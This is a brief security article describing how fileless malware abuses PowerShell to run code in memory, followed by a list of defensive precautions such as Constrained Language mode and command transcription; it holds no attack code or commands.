File-less Malware Is Wreaking Havoc Via PowerShell
Windows is not a platform PowerShell is limited to. Microsoft Exchange, IIS and SQL servers also fall into line.
What file-less malware does is that it forces PowerShell to institute its malicious code into the console and the RAM.
It becomes a “lateral” attack once the code gets executed, meaning the attack propagates from the central server.
As after the dirty work’s done the malware leaves no traces behind, traditional security solutions are never able to place what was behind the attack.
Only heuristic monitoring systems, if run constantly could help in tracing the attack’s culprit.
Precautionary Measures Against Fileless Malware
- Disable PowerShell (If it’s not required to administer systems)
- If it can’t be disabled, ensure that you’re using the latest version of it. (PowerShell 5 has better security measures in Windows)
- Only enable specific features of PowerShell via “Constrained Language” mode.
- Enable automatic transcription of commands which will help in making the system suspicious about file-less attacks.
- Employ advanced cyber-security methods such as permanent anti-malware services.
- Do constant research on unknown processes occurring within the system which could generate file-less malware.